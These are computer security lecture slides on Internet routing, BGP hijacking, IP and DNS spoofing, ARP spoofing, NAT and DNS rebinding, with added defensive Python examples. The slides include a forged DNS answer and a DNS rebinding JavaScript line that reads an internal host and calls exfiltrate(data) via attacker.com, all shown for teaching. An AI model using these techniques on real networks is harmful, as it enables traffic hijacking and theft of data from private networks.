Introduction to the Internet
ECEN 5032: Intro to Computer Security October 5, 2016
Internet: History
ARPANET “log”
Packet-switched network
Send chunks of data
Source address (from)
Destination address (to)
[Diagram: a packet labelled “To: B  From: A”]
Early packet-switched networks
“Best-effort”
Goal of the Internet
Get packet from A to B Quickly?
Reliably?
Securely?
[Diagram: a mesh of nodes A, F, H, M, P, J, B, R, G; the packet from A must reach B]
Get packet to B!
From H’s perspective
[Diagram: H knows only its own links (to A, J, M); where B lies behind them is unknown (“?”)]
Naïve approach: send to all
[Diagram, animated over several slides: H copies the packet to every neighbour, every neighbour copies it to all of its neighbours, and copies addressed to B multiply across the whole network]
Ahhhhh!! (BBBBB BBB BBBB…)
Back to H’s perspective
[Diagram: H again, with the unknown (“?”) links toward B]
Send to all will not scale!
Better approach: send to next closest node
[Diagram, animated over several slides: the packet is handed hop by hop from H toward B along one path, each node passing it to whichever neighbour is closer to B]
Who is closer?
Enter: Routing Tables
Each node has a unique routing table
Tells a node who next to forward to (next hop), given a destination
H’s routing table (“–” = directly connected neighbour, no next hop needed):
Destination   Next Hop
A             –
J             –
M             –
F, P, R       M
G             J
B             M
[Diagram: the same network with H’s next hops highlighted]
Classless Inter-Domain Routing (CIDR)
Blocks of IP addresses
Prefix
▪ 128.138.113.0 = 0x80 8a 71 00
▪ 32-bit IPv4 address
Prefix size (number of significant bits)
▪ /24 = 0xFF FF FF 00 (24 bits of 1)
▪ Netmask: 255.255.255.0 (/24), 255.255.0.0 (/16)
E.g.:
10.0.2.0/24 = 10.0.2.*
10.0.2.0/25 = 10.0.2.0 – 10.0.2.127
10.0.2.0/26 = 10.0.2.0 – 10.0.2.63
Real Routing Tables
$ ip route show
default via 128.138.97.129 dev eno1 onlink
128.138.97.128/25 dev eno1 proto kernel scope link src 128.138.97.189

# (old/deprecated way)
$ route -n
Kernel IP routing table
Destination     Gateway         Genmask          Flags Iface
0.0.0.0         128.138.97.129  0.0.0.0          UG    eno1
128.138.97.128  0.0.0.0         255.255.255.128  U     eno1

If packet to 128.138.97.128/25, send locally (direct to MAC addr)
Else, forward packet to MAC of default gateway (128.138.97.129)
[Diagram: the local /25 containing this host 128.138.97.189 (MAC bb:bb:bb:bb:bb:bb), another host 128.138.97.200 (MAC cc:cc:cc:cc:cc:cc) and the gateway 128.138.97.129 (MAC aa:aa:..:aa), which connects to the Internet]
What do packets look like?
Layers, top to bottom:
Application layer: HTTP (HTML, videos, memes, cat pictures, …), TLS
Transport layer (e.g. TCP, UDP, SCTP)
Network layer (e.g. IPv4, IPv6)
Link layer, e.g. Ethernet (MAC addresses), ATM, …
Physical, e.g. WiFi, Ethernet cable, phone line, fiber, …
What does a packet look like?
One captured frame, as raw bytes:
d404cd867432f859718e99c30800450000bf74 f7400040067e9bc0a8000f12ea7305d7e60050 266cc951942d78aa801801f6f59c0000010108 0afdfc5bfa296efff1474554202f2048545450 2f312e310d0a557365722d4167656e743a2057 6765742f312e31392e3420286c696e75782d67 6e75290d0a4163636570743a202a2f2a0d0a41 63636570742d456e636f64696e673a20696465 6e746974790d0a486f73743a206563656e3431 33332e6f72670d0a436f6e6e656374696f6e3a 204b6565702d416c6976650d0a0d0a
The same frame split by layer:
Ethernet: d404cd867432f859718e99c30800
IP:       450000bf74f7400040067e9bc0a8000f12ea7305
TCP:      d7e60050266cc951942d78aa801801f6f59c00000101080afdfc5bfa296efff1
HTTP:     474554202f20485454502f312e310d0a557365722d4167656e743a20576765742f312e31392e3420286c696e75782d676e75290d0a4163636570743a202a2f2a0d0a4163636570742d456e636f64696e673a206964656e746974790d0a486f73743a206563656e343133332e6f72670d0a436f6e6e656374696f6e3a204b6565702d416c6976650d0a0d0a
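As an added example (not part of the slides), the Python below takes the slide’s own hex dump and peels it layer by layer with the standard library only: Ethernet II header, IPv4 header (including the RFC 1071 checksum check a receiver performs), TCP header, and finally the HTTP request carried in the payload. The only input is the dump shown above; every field offset used is the standard header layout for that protocol.

```python
import struct

# Hex dump copied from the slide above (one Ethernet frame, 205 bytes).
PACKET_HEX = "".join([
    "d404cd867432f859718e99c30800450000bf74",
    "f7400040067e9bc0a8000f12ea7305d7e60050",
    "266cc951942d78aa801801f6f59c0000010108",
    "0afdfc5bfa296efff1474554202f2048545450",
    "2f312e310d0a557365722d4167656e743a2057",
    "6765742f312e31392e3420286c696e75782d67",
    "6e75290d0a4163636570743a202a2f2a0d0a41",
    "63636570742d456e636f64696e673a20696465",
    "6e746974790d0a486f73743a206563656e3431",
    "33332e6f72670d0a436f6e6e656374696f6e3a",
    "204b6565702d416c6976650d0a0d0a",
])


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def ip_checksum(header):
    """RFC 1071 one's-complement sum of 16-bit words; a valid header sums to 0."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack(f"!{len(header) // 2}H", header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_frame(hexdump):
    """Peel the frame layer by layer: Ethernet -> IPv4 -> TCP -> HTTP."""
    raw = bytes.fromhex(hexdump)

    # Ethernet II: 6-byte destination MAC, 6-byte source MAC, 2-byte EtherType.
    eth_dst, eth_src, ethertype = struct.unpack("!6s6sH", raw[:14])
    if ethertype != 0x0800:
        raise ValueError(f"not IPv4 (EtherType 0x{ethertype:04x})")

    # IPv4: header length in 32-bit words; total length covers header + payload.
    ip_off = 14
    ihl = (raw[ip_off] & 0x0F) * 4
    total_len = struct.unpack("!H", raw[ip_off + 2:ip_off + 4])[0]
    ttl, proto = raw[ip_off + 8], raw[ip_off + 9]
    ip_hdr = raw[ip_off:ip_off + ihl]
    if proto != 6:
        raise ValueError(f"not TCP (protocol {proto})")

    # TCP: ports, seq/ack, then data offset (4 bits) and flags in one 16-bit field.
    tcp_off = ip_off + ihl
    sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", raw[tcp_off:tcp_off + 14])
    data_off = (off_flags >> 12) * 4          # options (here: NOP, NOP, timestamp) included
    payload = raw[tcp_off + data_off:ip_off + total_len]

    # HTTP: request line, then "Name: value" headers up to the blank line.
    text = payload.decode("ascii")
    request_line, _, rest = text.partition("\r\n")
    headers = {}
    for line in rest.split("\r\n"):
        if not line:
            break
        name, _, value = line.partition(": ")
        headers[name] = value

    return {
        "eth_dst": mac_str(eth_dst), "eth_src": mac_str(eth_src),
        "src_ip": ip_str(ip_hdr[12:16]), "dst_ip": ip_str(ip_hdr[16:20]),
        "ttl": ttl, "ip_checksum_ok": ip_checksum(ip_hdr) == 0,
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "flags": off_flags & 0x01FF, "payload_len": len(payload),
        "request_line": request_line, "headers": headers,
    }


if __name__ == "__main__":
    for key, value in parse_frame(PACKET_HEX).items():
        print(f"{key:15} {value}")
```

Running it shows the frame is a plain-text HTTP `GET /` from 192.168.0.15 to port 80 of 18.234.115.5 (the same address the DNS slides later resolve ecen4133.org to), with `Host: ecen4133.org` and a Wget user agent readable by anyone on the path; the TCP flags decode to PSH+ACK and the IPv4 checksum verifies.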
What do packets look like?
Problem solved!
Real routing tables
Destinations are CIDR blocks
▪ E.g. 141.212.0.0/16
Next hop (gateway) is a single IP on a physically connected network
▪ May belong to another Autonomous System (AS), e.g.:
▪ AS 237 (Merit)
▪ AS 104 (CU Boulder)
▪ AS 7018 (AT&T)
▪ AS 14041 (UCAR / FRGP)
…or is it?
How do we get these magical routing tables? Enter: Border Gateway Protocol (BGP)
179/TCP connection between two routers
Provide reachability information via UPDATE messages
BGP UPDATE
[Diagram, animated over several slides: reachability for B spreads outward from R; each router that learns a route re-announces it with itself prepended to the AS PATH]
R: “Hey everyone! I can reach B! AS PATH: R”
P: “I can reach B! AS PATH: P R”
F: “I can reach B! AS PATH: F P R”
G: “I can reach B! AS PATH: G P R”
M: “I can reach B! AS PATH: M P R”
J: “I can reach B! AS PATH: J G P R”
H: “I can reach B! AS PATH: H M P R”
Final state, each router’s path to B: R: R; P: P R; F: F P R; M: M P R; G: G P R; J: J G P R; H: H M P R
BGP: Security?
[Diagram: a new router E, a neighbour of J, announces “I can reach B! AS PATH: E”]
Result: routers for which E’s announcement gives a shorter path switch to it: J: J E; G: G J E; H: H J E. F, M and P keep their paths through R (F P R, M P R, P R); R keeps R
BGP “hijacks” of 1.0.0.0/8
[Figure: announcements of 1.0.0.0/8 over time, with the point where 1/8 was allocated marked]
BGP: prefix hijacking
It gets worse:
Real routes are blocks (e.g. /16 network block)
Routers choose the most specific matching prefix, and among equal prefixes the shortest AS PATH, so two /17s override a /16:
Destination        Next Hop        AS PATH
128.138.0.0/16     192.12.80.70    104 (CU Boulder)
128.138.0.0/17     198.109.93.50   600 12145 (CSU)
128.138.128.0/17   198.109.93.50   600 12145 (CSU)
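The three routing slides above (CIDR arithmetic, the host’s `ip route` table with its /25 and default route, and the prefix-hijacking table) all come down to the same lookup rule. This added example, not from the slides, implements it in Python with the standard `ipaddress` module: a CIDR helper, longest-prefix match with shortest-AS-PATH tie-break, and a small monitoring check that flags a more-specific prefix whose origin AS differs from the covering prefix’s origin, which is what the two CSU /17s look like to an operator watching the CU Boulder /16. The prefixes, next hops and AS numbers are the slides’ own; “on-link” as a next-hop marker is my convention.

```python
import ipaddress

# Routes copied from the slides: (prefix, next hop, AS PATH).
# "on-link" is this example's marker for "deliver directly by MAC address".
HOST_ROUTES = [
    ("128.138.97.128/25", "on-link", []),
    ("0.0.0.0/0", "128.138.97.129", []),              # default route
]
BGP_ROUTES = [
    ("128.138.0.0/16", "192.12.80.70", [104]),        # CU Boulder
    ("128.138.0.0/17", "198.109.93.50", [600, 12145]),   # CSU, more specific
    ("128.138.128.0/17", "198.109.93.50", [600, 12145]),
]


def cidr_info(cidr):
    """Netmask, first address, last address and size of a CIDR block."""
    net = ipaddress.ip_network(cidr, strict=False)
    return (str(net.netmask), str(net.network_address),
            str(net.broadcast_address), net.num_addresses)


def best_route(table, dst):
    """Longest-prefix match; among equal-length prefixes the shortest AS PATH wins."""
    addr = ipaddress.ip_address(dst)
    matches = [r for r in table if addr in ipaddress.ip_network(r[0])]
    if not matches:
        return None
    return max(matches,
               key=lambda r: (ipaddress.ip_network(r[0]).prefixlen, -len(r[2])))


def more_specific_alerts(table):
    """Monitoring heuristic: report any prefix that is covered by a wider prefix
    whose origin AS (last element of the AS PATH) is different."""
    alerts = []
    for prefix, _, path in table:
        net = ipaddress.ip_network(prefix)
        for cover, _, cover_path in table:
            cover_net = ipaddress.ip_network(cover)
            if (cover_net.prefixlen < net.prefixlen and net.subnet_of(cover_net)
                    and path and cover_path and path[-1] != cover_path[-1]):
                alerts.append((prefix, path[-1], cover, cover_path[-1]))
    return alerts


if __name__ == "__main__":
    print(cidr_info("10.0.2.0/25"))
    print(best_route(HOST_ROUTES, "128.138.97.189"))   # local /25
    print(best_route(HOST_ROUTES, "18.234.115.5"))     # default gateway
    print(best_route(BGP_ROUTES, "128.138.97.189"))    # the CSU /17 wins over the /16
    for alert in more_specific_alerts(BGP_ROUTES):
        print("more-specific prefix with different origin:", alert)
```

Note that `more_specific_alerts` cannot tell a legitimate sub-delegation from a hijack; like the “multiple vantage points” defense on a later slide, it only turns a silent routing change into something a human can review.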
YouTube Hijack (Feb 2008)
(animated over several slides)
1. AS36561 (YouTube): 208.65.152.0/22
2. AS17557 (Pakistan Telecom): 208.65.153.0/24 (more specific than YouTube’s /22)
3. AS36561 (YouTube): 208.65.153.0/24 (same length as the hijacked prefix)
4. AS36561 (YouTube): 208.65.153.0/25 and 208.65.153.128/25 (more specific than the hijacked prefix)
http://youtu.be/IzLPKuAOe50
BGP hijack defenses
Not everyone gets to BGP
Multiple vantage points help detect hijacks
Human response vs Computers
S-BGP
soBGP
Pretty Secure BGP
Pretty Good BGP
But misconfigurations/DoS still common
IP spoofing
Who said we had to be honest about the source address?
IP spoofing: defenses
Ingress Filtering
Reverse Path Forwarding (detect lies with a FIB)
TCP
Each host uses sequence numbers (32-bits) to prevent blind spoofing
IP spoofing around defenses
Ingress Filtering not at all ISPs
TCP not perfect or the only protocol…
Backscatter
TCP windows? UDP?
UDP!
What uses UDP?
Networked games
VoIP (RTP)
DNS
DNS
1.2.3.4 -> 4.2.2.1: What’s the IP for www.hobocomp.com? (TXID: 45121)
4.2.2.1 -> 1.2.3.4: www.hobocomp.com IN A 68.40.59.167 (TXID: 45121) TTL 1789
DNS
1.2.3.4 -> 4.2.2.1: IP for ecen4133.org?
4.2.2.1 -> k.root-servers.net:
;; QUESTION SECTION:
;ecen4133.org. IN A
;; AUTHORITY SECTION:
org. 172800 IN NS a0.org.afilias-nst.info.
org. 172800 IN NS a2.org.afilias-nst.info.
;; ADDITIONAL SECTION:
a0.org.afilias-nst.info. 172800 IN A 199.19.56.1
a2.org.afilias-nst.info. 172800 IN A 199.249.112.1
DNS
4.2.2.1 -> 199.19.56.1: IP for ecen4133.org?
;; QUESTION SECTION:
;ecen4133.org. IN A
;; AUTHORITY SECTION:
ecen4133.org. 86400 IN NS dns1.registrar-servers.com.
ecen4133.org. 86400 IN NS dns2.registrar-servers.com.
;; ADDITIONAL SECTION:
ns8.zoneedit.com. 172800 IN A 75.125.10.187
ns16.zoneedit.com. 172800 IN A 69.64.68.41
DNS
4.2.2.1 -> dns1.registrar-servers.com: IP for ecen4133.org?
;; QUESTION SECTION:
;ecen4133.org. IN A
;; ANSWER SECTION:
ecen4133.org. 300 IN A 18.234.115.5
;; AUTHORITY SECTION:
ecen4133.org. 1800 IN NS dns1.registrar-servers.c
ecen4133.org. 1800 IN NS dns2.registrar-servers.c
DNS
4.2.2.1 -> 1.2.3.4: I found your answer (finally!)
▪ ecen4133.org. IN A 18.234.115.5
Bad guy:
Spoof responses from 4.2.2.1 (or higher)
Has to guess the TXID…
▪ Only 65536 possible values
▪ Bandwidth helps
▪ Can play this game more than once
▪ Own 783.google.com? Great, delegate to www.google.com, which, oh, by the way, is 6.6.6.6
▪ “4.2.2.1” -> 1.2.3.4 (TXID lucky_guess)
  783.google.com IN CNAME www.google.com
  www.google.com IN A 6.6.6.6
DNS poisoning defenses
Randomize source port on lookups
Lookup random case: “gOogLE.cOM”
DNSSEC
Have records be signed by higher-level DNS
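The first two defenses above are both checks a resolver makes on an incoming response before believing it. As an added example, not from the slides, the Python below implements just that matching step: each outstanding query is remembered by a random 16-bit TXID, a random source port and a randomly-cased question name (the “0x20” trick; authoritative servers echo the question back exactly as sent), and a response is accepted only if all three agree. `guess_space_bits` gives the number of bits an off-path spoofer would have to hit at once. The query name and answer are the www.hobocomp.com record from the earlier slide; the resolver class and the seeded RNG are mine, and DNSSEC (signatures) is not modelled here.

```python
import random


def randomize_case(name, rng):
    """DNS 0x20: flip the case of each letter at random. The server copies the
    question back verbatim, so a forged answer must reproduce the same case."""
    return "".join(c.swapcase() if (c.isalpha() and rng.getrandbits(1)) else c
                   for c in name)


def guess_space_bits(name):
    """Bits an off-path spoofer must guess: 16 (TXID) + 16 (source port) + 1 per letter."""
    return 16 + 16 + sum(c.isalpha() for c in name)


class StubResolver:
    """Only the response-matching part of a resolver, with source-port and
    0x20 randomization. `seed` exists so the behaviour is reproducible in tests."""

    def __init__(self, seed=None):
        self.rng = random.Random(seed)
        self.pending = {}          # (txid, source port) -> 0x20-cased question name

    def send_query(self, name):
        txid = self.rng.getrandbits(16)
        sport = self.rng.randint(1024, 65535)      # random, not a fixed port
        qname = randomize_case(name, self.rng)
        self.pending[(txid, sport)] = qname
        return txid, sport, qname                  # what actually goes on the wire

    def accept(self, txid, dst_port, qname, answer):
        """Deliver `answer` only if TXID, destination port and the exact-case
        question name all match an outstanding query; otherwise drop it."""
        expected = self.pending.get((txid, dst_port))
        if expected is None or expected != qname:   # case-sensitive comparison
            return None
        del self.pending[(txid, dst_port)]          # one answer per query
        return answer


if __name__ == "__main__":
    resolver = StubResolver()
    txid, sport, qname = resolver.send_query("www.hobocomp.com")
    print("sent", txid, sport, qname, "- spoofer must guess",
          guess_space_bits("www.hobocomp.com"), "bits")
    print("wrong case:", resolver.accept(txid, sport, "www.hobocomp.com", "6.6.6.6"))
    print("matching:", resolver.accept(txid, sport, qname, "68.40.59.167"))
```

The design point is that all three fields are independent: a spoofer who learns one (say, the port, from a resolver that reuses it) still faces the others, and `accept` consumes the pending entry so the “play this game more than once” strategy needs a fresh query each time.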
Network switches vs hubs
Hubs broadcast received packets to all other links
Switches only send to links that have sent from that Layer-2 address
E.g. If you see a packet from A on port 1, send all packets to A to port 1.
Attacks?
Address Resolution Protocol (ARP)
[Diagram, animated over several slides: one LAN with an Internet gateway 10.0.0.1 (ee:ee:ee:ee:ee:ee) and two hosts, 10.0.0.8 (cc:cc:cc:cc:cc:cc) and 10.0.0.5 (aa:aa:aa:aa:aa:aa)]
10.0.0.8 broadcasts: “Who is 10.0.0.5? (I’m 10.0.0.8 (cc:cc:cc:cc:cc:cc))”
10.0.0.5 replies with its address, aa:aa:aa:aa:aa:aa; each host now caches the other’s IP -> MAC mapping (10.0.0.8 -> cc:cc:cc:cc:cc:cc, 10.0.0.5 -> aa:aa:aa:aa:aa:aa)
Last slide: 10.0.0.8 announces that 10.0.0.1 is at cc:cc:cc:cc:cc:cc, and 10.0.0.5’s cache now maps the gateway’s IP to 10.0.0.8’s MAC
ARP spoofing defenses?
ARP spoofing defenses
Hard-code/configure switch with specific MAC addresses on specific ports
Separate untrusted hosts onto a separate subnet/VLAN
Clients can track changes in IP <-> MAC mapping, e.g. ArpON, ArpWatch
Cryptographically sign updates?
Hard to do without a trusted third-party that can vouch for identities (which remote CA-like entities can’t do)
Short answer: don’t trust your local subnet! Use VPNs/end-to-end encryption when possible
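The “track changes in the IP <-> MAC mapping” defense (ArpWatch and friends) is simple enough to show in full. This added example, not from the slides or from either tool, replays the slides’ LAN in Python: it learns bindings from ARP replies, reports when an IP suddenly answers from a different MAC, refuses to overwrite bindings that were configured statically (the “hard-code” defense on the slide), and adds a second heuristic, one MAC answering for several IPs. The ARP trace is constructed to follow the slides; the class and field names are mine.

```python
from collections import namedtuple

ArpReply = namedtuple("ArpReply", "sender_ip sender_mac")

# Constructed trace following the slides' LAN: gateway 10.0.0.1, hosts 10.0.0.8
# and 10.0.0.5; the last reply is 10.0.0.8 claiming the gateway's IP.
TRACE = [
    ArpReply("10.0.0.1", "ee:ee:ee:ee:ee:ee"),
    ArpReply("10.0.0.5", "aa:aa:aa:aa:aa:aa"),
    ArpReply("10.0.0.8", "cc:cc:cc:cc:cc:cc"),
    ArpReply("10.0.0.1", "cc:cc:cc:cc:cc:cc"),
]


class ArpWatcher:
    """ArpWatch-style tracker: learn IP -> MAC bindings and alert on changes."""

    def __init__(self, static=None):
        self.static = dict(static or {})   # configured bindings, never overwritten
        self.table = dict(self.static)     # ip -> mac, learned from traffic
        self.alerts = []

    def observe(self, reply):
        ip, mac = reply.sender_ip, reply.sender_mac
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac           # first time we see this IP
            return None
        if known == mac:
            return None                    # consistent with what we know
        if ip in self.static:
            alert = ("static-conflict", ip, known, mac)   # keep the pinned binding
        else:
            alert = ("changed", ip, known, mac)
            self.table[ip] = mac           # learn the change, but report it
        self.alerts.append(alert)
        return alert

    def macs_claiming_multiple_ips(self):
        """One MAC answering for several IPs (e.g. a host and the gateway)."""
        by_mac = {}
        for ip, mac in self.table.items():
            by_mac.setdefault(mac, set()).add(ip)
        return {m: ips for m, ips in by_mac.items() if len(ips) > 1}


def run(trace, static=None):
    watcher = ArpWatcher(static)
    for reply in trace:
        watcher.observe(reply)
    return watcher


if __name__ == "__main__":
    w = run(TRACE)
    print("alerts:", w.alerts)
    print("one MAC, many IPs:", w.macs_claiming_multiple_ips())
    pinned = run(TRACE, static={"10.0.0.1": "ee:ee:ee:ee:ee:ee"})
    print("with gateway pinned, 10.0.0.1 still maps to", pinned.table["10.0.0.1"])
```

A real deployment feeds `observe` from a packet capture on the segment; as the slide says, the watcher can only detect and report, so the gateway binding is the one worth configuring statically.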
Network Address Translation (NAT)
Running out of IPv4 addresses (only 2^32 possible!)
Need a way to share public IPs with lots of hosts
RFC1918: Private IP addresses
▪ 10.0.0.0/8
▪ 192.168.0.0/16
▪ 172.16.0.0/12
Network Address Translation (NAT)
1. Hand out Private (RFC1918) addresses to local devices
2. Intercept outgoing connections (at the gateway), and replace private IP with the shared public address
3. Keep a map of outgoing source port/destination; return traffic must be translated back (to send to the original private IP)
Incoming connections?
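The three NAT steps above, as an added Python example that is not from the slides: outgoing packets from an RFC1918 source are rewritten to the gateway’s public address and a fresh port, the mapping is recorded, return traffic is translated back, and an inbound packet with no mapping (an unsolicited incoming connection, the slide’s closing question) is dropped. The public address 128.138.97.189 and the RFC1918 ranges are from the slides; the port range and the 4-tuple keying are my simplifications of what a real NAT does.

```python
import ipaddress
import itertools

# RFC 1918 private ranges, as listed on the slide.
PRIVATE = [ipaddress.ip_network(p)
           for p in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1918(ip):
    return any(ipaddress.ip_address(ip) in net for net in PRIVATE)


class Nat:
    """Port-translating NAT gateway following the slide's three steps."""

    def __init__(self, public_ip, first_port=40000):
        self.public_ip = public_ip
        self.ports = itertools.count(first_port)   # next unused public port
        self.out_map = {}   # (priv_ip, priv_port, dst_ip, dst_port) -> public port
        self.in_map = {}    # (public port, dst_ip, dst_port) -> (priv_ip, priv_port)

    def outgoing(self, src_ip, src_port, dst_ip, dst_port):
        """Step 2: replace a private source with the shared public address."""
        if not is_rfc1918(src_ip):
            return (src_ip, src_port, dst_ip, dst_port)   # already public
        key = (src_ip, src_port, dst_ip, dst_port)
        if key not in self.out_map:                        # step 3: remember the mapping
            pub_port = next(self.ports)
            self.out_map[key] = pub_port
            self.in_map[(pub_port, dst_ip, dst_port)] = (src_ip, src_port)
        return (self.public_ip, self.out_map[key], dst_ip, dst_port)

    def incoming(self, src_ip, src_port, dst_ip, dst_port):
        """Translate return traffic back to the private host. A packet with no
        mapping (an unsolicited inbound connection) returns None and is dropped."""
        if dst_ip != self.public_ip:
            return None
        inner = self.in_map.get((dst_port, src_ip, src_port))
        if inner is None:
            return None
        return (src_ip, src_port) + inner


if __name__ == "__main__":
    nat = Nat("128.138.97.189")
    out = nat.outgoing("10.0.0.5", 51000, "18.234.115.5", 80)
    print("outgoing rewritten to", out)
    print("reply translated to", nat.incoming("18.234.115.5", 80, out[0], out[1]))
    print("unsolicited inbound:", nat.incoming("6.6.6.6", 4444, "128.138.97.189", 22))
```

Because the mapping is keyed on the destination too, a reply from any other host to the same public port is rejected, which is why hosts behind a NAT are unreachable from outside unless a mapping (port forward) is configured by hand.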
DNS rebinding
Attacker wants to access hosts internal to a NAT (e.g. 10.0.0.1)
Can get victim on the NAT to visit attacker’s website (attacker.com, at 6.6.6.6)
Attacker tries to run JavaScript. What happens?
$.get('http://10.0.0.1/', function(data) { exfiltrate(data); });
DNS rebinding
Attacker instead runs:
$.get('http://attacker.com/', function(data) { exfiltrate(data); });
What happens?
DNS rebinding
Attacker instead runs:
$.get('http://attacker.com/', function(data) { exfiltrate(data); });
What happens?
Browser checks to see if attacker.com’s DNS entry has expired
If it has, make another DNS query for attacker.com
On this second query, attacker.com returns 10.0.0.1
Browser makes HTTP request to 10.0.0.1, defeating the Same-Origin Policy!
Defenses?
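Two standard answers to the slide’s closing “Defenses?”, as an added Python example (not from the slides): a resolver-side filter that refuses to return a private, loopback or link-local address for an external name, which is what dnsmasq’s `--stop-dns-rebind` option does, and browser-side DNS pinning, which keeps using the first address resolved for an origin for as long as the page lives, so the second, rebound answer is never used. The hostnames, 6.6.6.6 and 10.0.0.1 are the slides’; `corp.example` is a placeholder for an organisation’s own internal domain, and the resolver callback is a stand-in for a real lookup.

```python
import ipaddress


def rebinding_guard(name, answer_ip, internal_suffixes=()):
    """Resolver-side check: return True if the answer may be handed to the client.
    Names under `internal_suffixes` are allowed to resolve to internal addresses;
    any other name resolving to a private/loopback/link-local address is refused."""
    ip = ipaddress.ip_address(answer_ip)
    name = name.rstrip(".").lower()
    if any(name == s or name.endswith("." + s) for s in internal_suffixes):
        return True
    return not (ip.is_private or ip.is_loopback or ip.is_link_local)


def guarded_resolve(name, raw_resolve, internal_suffixes=()):
    """Wrap a lookup so a rebound answer is dropped instead of delivered."""
    answer = raw_resolve(name)
    return answer if rebinding_guard(name, answer, internal_suffixes) else None


class PinnedClient:
    """Browser-side DNS pinning: the address first resolved for a host is reused
    for the page's lifetime, so a later, changed DNS answer cannot redirect
    requests that the script believes go to the same origin."""

    def __init__(self, resolve):
        self.resolve = resolve
        self.pins = {}          # host -> pinned address

    def connect(self, host):
        if host not in self.pins:
            self.pins[host] = self.resolve(host)
        return self.pins[host]


if __name__ == "__main__":
    # Constructed attacker DNS behaviour from the slide: first 6.6.6.6, then 10.0.0.1.
    answers = iter(["6.6.6.6", "10.0.0.1"])
    attacker_dns = lambda host: next(answers)

    client = PinnedClient(attacker_dns)
    print("first request goes to", client.connect("attacker.com"))
    print("second request still goes to", client.connect("attacker.com"))

    print("resolver accepts attacker.com -> 6.6.6.6:", rebinding_guard("attacker.com", "6.6.6.6"))
    print("resolver accepts attacker.com -> 10.0.0.1:", rebinding_guard("attacker.com", "10.0.0.1"))
    print("internal name allowed:",
          rebinding_guard("printer.corp.example", "10.0.0.1", ("corp.example",)))
```

The two defenses sit at different places: the resolver filter protects every client on the network but needs an allow-list for names that legitimately resolve internally, while pinning is per browser and, on its own, still trusts whatever the first answer was. Neither replaces authentication on the internal service itself.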